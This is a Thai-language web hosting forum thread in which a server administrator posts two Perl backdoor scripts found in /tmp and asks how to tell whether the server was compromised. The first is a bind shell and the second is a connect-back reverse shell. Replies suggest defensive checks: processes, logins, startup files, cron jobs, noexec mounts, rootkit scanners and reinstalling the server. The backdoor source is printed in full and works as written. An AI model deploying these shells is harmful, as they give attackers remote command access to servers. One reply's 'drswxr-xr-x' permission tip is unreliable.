รบกวนหน่อยคึรับ มี script เหมือน พยายาม hack serve

Hosting discussion
1

คือผมเจอใน /tmp

แบบเท่าที่ พยายามดูเหมือนจะเป็น backdoor หรือเปล่าครับ
แล้วจะรู้ได้อย่างไรว่า เค้าทำ สำเร็จหรือเปล่านะครับ
จะแก้ไข หรือป้องกันได้อย่างไรดีครับ

[root@host tmp]# cat bd.pl
#!/usr/bin/perl
use Socket;
$p=9988;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp’));
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($p,INADDR_ANY));
listen(S,50);
while(1) {
accept(X,S);
if(!($pid=fork)){
if(!defined $pid){
exit(0);
}
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
exec("/bin/sh -i");
close X;
}
}[root@host tmp]# cat dc.pl
#!/usr/bin/perl

Data Cha0s Perl Connect Back Backdoor

Unpublished/Unreleased Source Code

use Socket;

print "Data Cha0s Connect Back Backdoor

";

if (!$ARGV[0]) {
printf “Usage: $0 [Host] <Port>
”;
exit(1);
}

print “
Dumping Arguments
”;

$host = $ARGV[0];
$port = 80;

if ($ARGV[1]) {
$port = $ARGV[1];
}

print “
Connecting…
”;

$proto = getprotobyname(‘tcp’) || die("[-] Unknown Protocol
");

socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error
");

my $target = inet_aton($host);

if (!connect(SERVER, pack “SnA4x8”, 2, $port, $target)) {
die("[-] Unable to Connect
");
}

print “
Spawning Shell
”;

if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");

exec {’/bin/sh’} ‘-bash’ . “\0” x 4;
exit(0);
}

print "
Detached

";

2

และผมเจอ แบบปกติ /dev/shm มันน่าจะเป็น 0 และไม่มีอะไรนะครับ

root@host root]# cd /dev/shm
[root@host shm]# ls
[root@host shm]# ls -al
total 132
drwxrwxrwt 4 root root 100 Sep 17 11:20 .
drwxr-xr-x 21 root root 118784 May 6 21:07 …
drwxr-xr-x 3 apache apache 100 Aug 21 13:50 .chr
-rw-r–r-- 1 apache apache 8550 Aug 21 15:02 .door.tgz
drwxr-xr-x 3 apache apache 80 Aug 27 21:30 .shm

มันใช่ตัวนี้ หรือเปล่าครับเนี่ย
ผมควรทำไงดี ลบดี หรือ ปิด หรือเช็คได้ไหมว่า hacker มันทำได้แค่ไหนแล้วนะครับ

3

backdoor shell ครับ ชัวร์
ตะกี๊เห็นทำ nosuid,noexec แล้วไม่ใช่เหรอครับ

บางทีก็ไม่เวิร์คนะครับ ไม่ 100%

man mount

[quote]

4

backdoor shell ครับ ชัวร์
ตะกี๊เห็นทำ nosuid,noexec แล้วไม่ใช่เหรอครับ

บางทีก็ไม่เวิร์คนะครับ ไม่ 100%

man mount

[quote]� � � � � � � noexec Do not allow direct execution of any binaries on the mounted file system.� (Until� recently
� � � � � � � � � �� it� was� possible to run binaries anyway using a command like /lib/ld*.so /mnt/binary. This
� � � � � � � � � �� trick fails since Linux 2.4.25 / 2.6.0.)
[/quote]
เพิ่งทำนะครับ
แต่ script นี้ ฝั่งมาตั้งแต่ 21สิงหาคม
เพิ่งสังเกตุ เจอนะครับ
ตอนนี้ กลัวไม่รุ้ว่า มันทำอะไรได้บ้างนะครับ
ต้องถึงกลับลงใหม่เลยไหมครับ
เราจะตรวจสอบได้ไหมว่า คนทำ backdoor เค้าสามารถทำอะไรได้
เพราะ ลอง search dc.pl หรือ Data Cha0s Connect Back Backdoor
แล้วเจอว่ามีคน โดนเยอะเหมือนกัน (คาดว่า คงเป็น script แจกเลย ไม่มีการดัดแปลงเลย)
แต่ พยายาม หาทางแก้ หรือตรวจสอบก็ไม่เจอเลย

5

อยากรู้เหมือนกันว่าจะหา Backdoor ในเครื่องยังไงครับ …

6

ตอนนี้ กลัวไม่รุ้ว่า มันทำอะไรได้บ้างนะครับ
ต้องถึงกลับลงใหม่เลยไหมครับ
เราจะตรวจสอบได้ไหมว่า คนทำ backdoor เค้าสามารถทำอะไรได้
เพราะ ลอง search dc.pl หรือ Data Cha0s Connect Back Backdoor
แล้วเจอว่ามีคน โดนเยอะเหมือนกัน (คาดว่า คงเป็น script แจกเลย ไม่มีการดัดแปลงเลย)
แต่ พยายาม หาทางแก้ หรือตรวจสอบก็ไม่เจอเลย

เป็น backdoor shell ธรรมดาครับ คงได้สิทธิเป็น nobody หรืออย่างดีก็เป็น user ธรรมดา
ไม่น่าทำอะไรมาก เพราะอาจเป็นเพียง script kiddies เข้ามา

ตอนนี้เข้าใจว่าคง kill proc นั้นไปแล้วใช่ไหมครับ ไม่งั้น น่าจะลองดูว่ามันรันเป็น user อะไร
แล้ว track จากตรงนั้น

ps -ef หรือ

ps -waux

แล้วมองหา process แปลกๆดู ตรงนี้ต้องอาศัยตาดูให้ละเอียดนิดนึง

ลองดู

last

ด้วย ว่ามี login แปลกๆ มาหรือไม่

ควรดูใน /etc/rc.local หรือ inittab ว่าเขาเอาอะไรมาฝากหรือเปล่าตอน boot
หรือตรวจ cron ต่างๆ

ไม่งั้นก็ต้องเข้าสูตรสำเร็จ คือ ลงเครื่องใหม่

ผมแนะนำให้ search phpbb ใน forum นี้ดูด้วย ไม่งั้นวันหลังก็โดนอีก (ถ้ามาจากตัวนั้น)

7

สังเกตุง่ายๆ ครับ มันจะมี ตัว s อยู่ข้างใน นี้
ตัวอย่าง

drwxrwxrwt 4 root root 100 Sep 17 11:20 .
drwxr-xr-x 21 root root 118784 May 6 21:07 …
drswxr-xr-x 21 root root 118784 May 6 21:07 … <===== อิๆๆ
drwxr-xr-x 3 apache apache 100 Aug 21 13:50 .chr
-rw-r–r-- 1 apache apache 8550 Aug 21 15:02 .door.tgz
drwxr-xr-x 3 apache apache 80 Aug 27 21:30 .shm

ลองดูนะครับ ps -aux

ไม่งั้นก็ตรวจสอบพอร์ทไปเลยครับ ใช้คำสั่ง … ลืม หุๆๆเดี๊ยวไปเอาปั๊กกะตืนมาก่อนเดี๊ยวมาบอก หุๆๆ เดี๊ยวจะหาว่ามั่ว อิๆๆ

8

tmp noexec มันกันแบบนี้ไม่ได้

perl /var/tmp/xxx.pl

ต้องใช้ mod_security ช่วยนะครับ

ลองใช้ chkrootkit www.chkrootkit.org, rkhunter http://www.rootkit.nl/downloads/
เช็คดูครับ

ไม่งั้นก็ต้องเข้าสูตรสำเร็จ คือ ลงเครื่องใหม่

วิธีนี้ดีที่สุดครับ สบายใจกว่า